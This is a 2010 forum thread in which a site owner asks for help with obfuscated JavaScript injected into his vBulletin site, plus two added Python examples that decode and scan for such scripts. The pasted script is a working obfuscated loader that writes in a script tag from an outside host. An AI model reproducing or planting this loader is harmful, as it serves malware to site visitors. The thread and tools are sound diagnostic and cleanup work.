  #1  
Old 04 May 2010, 12:30
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Hacked Site. Please help!

Hello,
I am hoping someone can help me out here. My site is being reported as being infected with malware. If I look at the source code I can see:

http://www.talkdisney.com/forums/wdw-theme-parks/

<script type="text/javascript">
var RSrAHsQFTSZ = "GXlLD17GXlLD29";
var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD";
var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl";
var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G";
var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6";
var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL";
var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX";
var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f";
var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD";
var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl";
var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G";
var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6";
var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL";
var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX";
var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d";
var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD";
var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl";
var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G";
var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2";
var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL";
var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX";
var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74";
var rTOwsCKOsBB21 = "GXlLD3e";
var ZrWBlSVWKBL = "MWp2m17GXlLD29";
var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21;
var wa79vdAM5Lo = "wqOw517CEXvL29";
tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%");
var FwL4HjvTvmP=unescape;
var RSrAHsQFTSZ = "CEXvL17MWp2m29";
q9124=this;
var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];
Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T));
</script>


But I can not find this in the templates or database to remove it. Any ideas on how to fix this?


After a little more research it also seems to only show up in IE, not in Firefox?
Thanks,
ryan
Reply With Quote
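The script in post #1 hides its payload as hex byte values separated by a junk marker, split across many variables, then rejoined, marker-swapped to "%" and passed to unescape(). The decoder below is an added example, not part of the original thread: it recovers what such a script would write into the page without executing any of it. The sample input, its KvK marker and the bad.example host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample in the same style as the injected script (not the real one):
# hex bytes separated by the marker "KvK", chunked across variables mid-marker.
SAMPLE = r'''
var junk = "KvK17XyZ29";
var p0 = "KvK3cKvK73KvK63KvK72KvK69KvK70KvK74KvK20KvK73KvK72Kv";
var p1 = "K63KvK3dKvK22KvK2fKvK2fKvK62KvK61KvK64KvK2eKvK65KvK78";
var p2 = "KvK61KvK6dKvK70KvK6cKvK65KvK2fKvK78KvK2eKvK6aKvK73";
var p3 = "KvK22KvK3eKvK3cKvK2fKvK73KvK63KvK72KvK69KvK70KvK74KvK3e";
var joined = p0 + p1 + p2 + p3;
enc = joined.replace(/KvK/g,"%");
var f=unescape; d = this["dZoZcuZment".replace(/[Z]/g, "")]; d.write(f(enc));
'''

STR_ASSIGN = re.compile(r'(?:var\s+)?(\w+)\s*=\s*"([^"]*)"\s*;')
CONCAT = re.compile(r'(?:var\s+)?(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*;')
TO_PERCENT = re.compile(r'(\w+)\s*=\s*(\w+)\.replace\(/([^/]+)/g\s*,\s*"%"\)')

def decode_injected_script(js):
    """Statically recover the strings the script would pass to unescape()."""
    strings = dict(STR_ASSIGN.findall(js))           # name -> string literal
    for name, expr in CONCAT.findall(js):            # name = a + b + c;
        parts = [p.strip() for p in expr.split("+")]
        if all(p in strings for p in parts):
            strings[name] = "".join(strings[p] for p in parts)
    decoded = []
    for _dst, src, marker in TO_PERCENT.findall(js):  # x = y.replace(/MARK/g,"%")
        if src in strings:
            # Assumption: the marker is plain text, as it is in this style of script.
            percent_encoded = strings[src].replace(marker, "%")
            decoded.append(unquote(percent_encoded, encoding="latin-1"))
    return decoded

if __name__ == "__main__":
    for markup in decode_injected_script(SAMPLE):
        print(markup)
```

The decoded markup names the external resource the page is being made to load, which is the string to search for in server logs and to confirm is gone after cleanup.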
  #2  
Old 04 May 2010, 20:08
kylek kylek is offline
 
Join Date: Oct 2003
Real name: Kyle
Tried to look at your site but Avast popped up a malicious URL blocked warning, info might help you, will send it via PM
__________________
Reply With Quote
  #3  
Old 05 May 2010, 08:04
ZomgStuff ZomgStuff is offline
 
Join Date: Feb 2007
I had a very similar problem just recently. Do you happen to have MGC chatbox installed?

You should look through your .js files, as that's where I found lots of copies of it.
Reply With Quote
  #4  
Old 05 May 2010, 14:02
ryancooper ryancooper is offline
 
Join Date: Jul 2002
@Kylek thanks for the info in PM. Looking now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!
Reply With Quote
  #5  
Old 05 May 2010, 18:43
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
Originally Posted by ryancooper View Post
@Kylek thanks for the info in PM. Looking now but so far no luck

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!
If you have a custom mod like a chatbox or any custom mods simply replace all the .js files of that mod w/ a fresh downloaded copy.

AdminCP > Maintenance > Diagnostics > Suspect File Versions

*Now, not all files are "suspect" or "bad" but that will help you track down the files if you are unaware of them all. Be sure to check your .js files as mentioned above and also check your templates for any iframes so search in templates for


Block Disabled:      (Update License Status)  
Suspended or Unlicensed Members Cannot View Code.

Leave the part after the = off so you can find all instances. Some of these malicious scripts utilize iframes; there is a currently popular iframe and js baddy for WordPress atm, so if you have that installed this could be the aftermath if they hacked your site via an exploit.
__________________
Daddy Does Dios and Figs!
https://www.linkedin.com/in/thelastsuperman

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
Reply With Quote
  #6  
Old 05 May 2010, 18:56
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Found it in my vbseo config file. No idea how it got there but it's gone now. Thanks for all your help.
Reply With Quote
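The file search suggested in posts #3 and #5, as an added example that is not part of the original thread. It covers PHP files as well as .js, since the script here turned up in a config file. The indicator patterns follow the shape of the script posted in #1; the extension list, file names and sample contents are constructed assumptions.

```python
import os
import re
import tempfile

# Patterns taken from the shape of the script posted in this thread, plus the
# iframe search suggested in post #5. A hit is a lead for review, not a verdict.
INDICATORS = {
    "marker_to_percent": re.compile(r'''\.replace\(\s*/[^/\n]+/g\s*,\s*["']%["']\s*\)'''),
    "unescape_alias": re.compile(r"=\s*unescape\s*;"),
    "hidden_property_name": re.compile(r'\[\s*"[^"\n]+"\.replace\('),
    "iframe_tag": re.compile(r"<iframe\b", re.I),
}
EXTENSIONS = (".js", ".php", ".html", ".htm", ".xml")  # assumption: adjust per site

def scan_text(text):
    """Return the sorted names of every indicator found in text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root):
    """Map relative path -> indicator names for each flagged file under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            if not filename.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, filename)
            with open(path, encoding="latin-1") as handle:  # latin-1 always decodes
                found = scan_text(handle.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

def demo():
    """Scan three constructed files: one clean, two carrying injected markup."""
    samples = {
        "clean.js": "function add(a, b) { return a + b; }\n",
        "config.php": '<?php $enabled = 1; ?>\n<script>e = j.replace(/KvK/g,"%"); '
                      'var f=unescape; d = this["dZoZcuZment".replace(/[Z]/g, "")]; '
                      "d.write(f(e));</script>\n",
        "footer.html": '<p>ok</p><iframe src="//bad.example/" width="0"></iframe>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="latin-1") as handle:
                handle.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, names in sorted(demo().items()):
        print(path, names)
```

Legitimate pages also use iframes, so treat an `iframe_tag` hit alone as something to read, and a file showing the other three indicators together as the likely injection point.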
  #7  
Old 05 May 2010, 20:20
legacy123 legacy123 is offline
 
Join Date: Feb 2010
I would definitely secure your files after seeing that
Reply With Quote